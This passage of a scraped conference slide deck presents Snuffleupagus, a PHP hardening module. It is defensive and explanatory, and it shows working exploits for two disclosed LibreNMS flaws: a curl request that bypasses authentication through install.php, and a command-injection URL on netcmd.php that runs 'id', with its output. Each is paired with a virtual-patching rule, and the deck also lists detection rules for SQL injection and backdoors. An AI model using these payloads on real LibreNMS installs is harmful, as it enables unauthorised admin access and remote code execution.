We're calling libxml_disable_entity_loader(true) at startup, and nop'ing its call.
73 / 106
![Page 74: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/74.jpg)
» Practical example
74 / 106
![Page 75: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/75.jpg)
» A couple of months ago, in a bar, ...
— I'm equally bored and drunk..
— Let's audit something
— What about LibreNMS?
— Sure, whatever
75 / 106
![Page 76: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/76.jpg)
» UnaUTheNtICatED RcE
Fig 15. LibreNMS users in the room.
76 / 106
![Page 77: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/77.jpg)
» What is librenms?
Welcome to LibreNMS, a fully featured networkmonitoring system that provides a wealth of featuresand device support.
More than 650 stars on github, and according toTwitter, has a lot of users.
77 / 106
![Page 78: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/78.jpg)
» LibREnMs sCreENsHot
78 / 106
![Page 79: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/79.jpg)
» ResPOnSibLE diScLOsuREWe burned those vulns at a private conferenceWe showed them in a public oneWe're now publishing a metasploit module¹ for them
¹ https://github.com/rapid7/metasploit-framework/pull/9213
79 / 106
![Page 80: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/80.jpg)
» Authentication bypass
install.php
if (empty($_POST) && !empty($_SESSION) && !isset($_REQUEST['stage'])) { $_POST = $_SESSION;} else { $_SESSION = $_POST;}
curl -i http://.../install.php -d "authenticated=1&userlevel=10&user_id=1"
You are now admin, congratulations.
80 / 106
![Page 81: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/81.jpg)
» Virtual patching itsp.filename("install.php").var("_POST[authenticated]").value_r(".*").drop();sp.filename("install.php").var("_POST[userlevel]").value_r(".*").drop();sp.filename("install.php").var("_POST[user_id]").value_r(".*").drop();
81 / 106
![Page 82: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/82.jpg)
» RCE
netcmd.php
$host = clean($_GET['query']); if (filter_var($host, FILTER_VALIDATE_IP, FILTER_FLAG_IPV6) || filter_var($host, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) || filter_var('http://'.$host, FILTER_VALIDATE_URL)) {...swtch($_GET['cmd']):... case 'nmap': ... $cmd = $config['nmap']." $host";... $output = `$cmd`;
http://...//netcmd.php?cmd=nmap&query=http://xxxx;echo${IFS}$(id)
Starting Nmap 7.40 ( https://nmap.org ) at 2017-05-25 19:35 CESTNmap done: 0 IP addresses (0 hosts up) scanned in 0.03 secondsuid=33(www-data) gid=33(www-data) groups=33(www-data)
82 / 106
![Page 83: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/83.jpg)
» Virtual patching itsp.filename("system").param("command").value_r("[^a-z0-9:/.]").drop();
83 / 106
![Page 84: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/84.jpg)
» Unrelated misc things# chmod hardeningsp.disable_function.function("chmod").param("mode").value_r("7$");sp.disable_function.function("chmod").param("mode").value_r("o\+w");
# backdoors detectionsp.disable_function.function("ini_get").param("var_name").value("open_basedir");sp.disable_function.function("is_callable").param("var").value("system");
# prevent execution of writeable filessp.readonly_exec.enable();
# Ghetto sqli detectionsp.disable_functions.function_r("mysqli?_query").ret("FALSE");sp.disable_functions.function_r("PDO::query").ret("FALSE");
# Ghetto sqli hardeningsp.disable_functions.function_r("mysqli?_query").param("query").value_r("/\*");sp.disable_functions.function_r("mysqli?_query").param("query").value_r("--");sp.disable_functions.function_r("mysqli?_query").param("query").value_r("#");sp.disable_functions.function("PDO::query").param("query").value_r("/\*");sp.disable_functions.function("PDO::query").param("query").value_r("--");sp.disable_functions.function("PDO::query").param("query").value_r("#");
84 / 106
![Page 85: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/85.jpg)
» Free vulnerabilities
Fig 16. The security team getting ready to capture new bugs
85 / 106
![Page 86: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/86.jpg)
» HarVEsTinG 0daYsIf you've got something like this
$line = system("grep $var dict.txt");
You can do something like that
sp.disable_function.function("system").var("var").regexp("[;`&|\n]").dump().allow();
And wait until someone finds a vuln to collect a working exploit.
86 / 106
![Page 87: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/87.jpg)
» PerFOrManCE imPAcT?
87 / 106
![Page 88: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/88.jpg)
» Performance impact
Fig 17. The management arguing with the security team about how securityslows down the website
88 / 106
![Page 89: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/89.jpg)
» Performance impact
Fig 17. A typical PHP application running at full speed
89 / 106
![Page 90: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/90.jpg)
» WhaT's leFt to doImproving our dereferencing system, so you can hook anythingFinding and fixing bugsKilling more bug-classes, like sloppy-comparisons and SQLI¹Party party party
¹ We're working on it ;)
90 / 106
![Page 91: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/91.jpg)
» WheRE caN yoU geT tHiswoNdER?
https://github.com/nbs-system/snuffleupagus for the sauce codehttps://snuffleupagus.rtfd.io for the (amazing) documentationCome talk to us, we're friendly!
91 / 106
![Page 92: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/92.jpg)
» ResULtS
92 / 106
![Page 93: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/93.jpg)
» CusTOmeRs
Fig 18. Customers lining up on the website without noticing that it's a PHPtrashfire.
93 / 106
![Page 94: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/94.jpg)
» SecURitY teAM
Fig 19. The security team is now friend with your PHP application.
94 / 106
![Page 95: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/95.jpg)
» DevELopERs
Fig 20. Developers are writing code as usual, but it's ok.
95 / 106
![Page 96: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/96.jpg)
» SpeAKinG of pHp, diD yoUkNow tHat…
96 / 106
![Page 97: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/97.jpg)
» PhP suPpORtS emOJi<?phpfunction � ($♥) { echo $♥;}$� ⚕ = 1;echo $� ⚕ ;�(42);
97 / 106
![Page 98: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/98.jpg)
» PhP7 is noW usINg zend_stringZ_STRVAL to get the char* value from a zval*ZSTR_VAL to get the char* value from a zend_string*Z_STR to get the zend_string* from a zval*ZVAL_STRING to create a zval from a char*ZVAL_STR to create a zval from a zend_string*ZSTR_ALLOCA_ALLOC to allocate a zend_string*STR_ALLOCA_ALLOC does the same thing.ZSTR_ALLOCA_INIT to allocate and init a zend_string from a char*ZVAL_NEW_STR assign a zval* from a zend_string*
98 / 106
![Page 99: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/99.jpg)
» ManDAtoRy NAl quOTe
There are only two kinds of languages: the ones people complainabout and the ones nobody uses.
— Bjarne Stroustrup
Did you know that more than ¾ of the web is using PHP?
99 / 106
![Page 100: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/100.jpg)
» CheERsThe RIPS people for their awesome scannerSectionEins for Suhosin and inspirationThe HardenedPHP project for leading the waywebsec.fr for showcasting our most convoluted exploitsOur guinea pigs friends who alpha-tested everythingFolks that called us names gave us constructive feedback
100 / 106
![Page 101: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/101.jpg)
101 / 106
![Page 102: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/102.jpg)
» Get it!https://github.com/nbs-system/snuffleupagushttps://snuffleupagus.readthedocs.ioCome talk to us!
102 / 106
![Page 103: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/103.jpg)
» BonUS onE
103 / 106
![Page 104: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/104.jpg)
» BonUS tWo
104 / 106
![Page 105: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/105.jpg)
» BonUS tHreE
105 / 106
![Page 106: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/106.jpg)
» BonUS foUR
106 / 106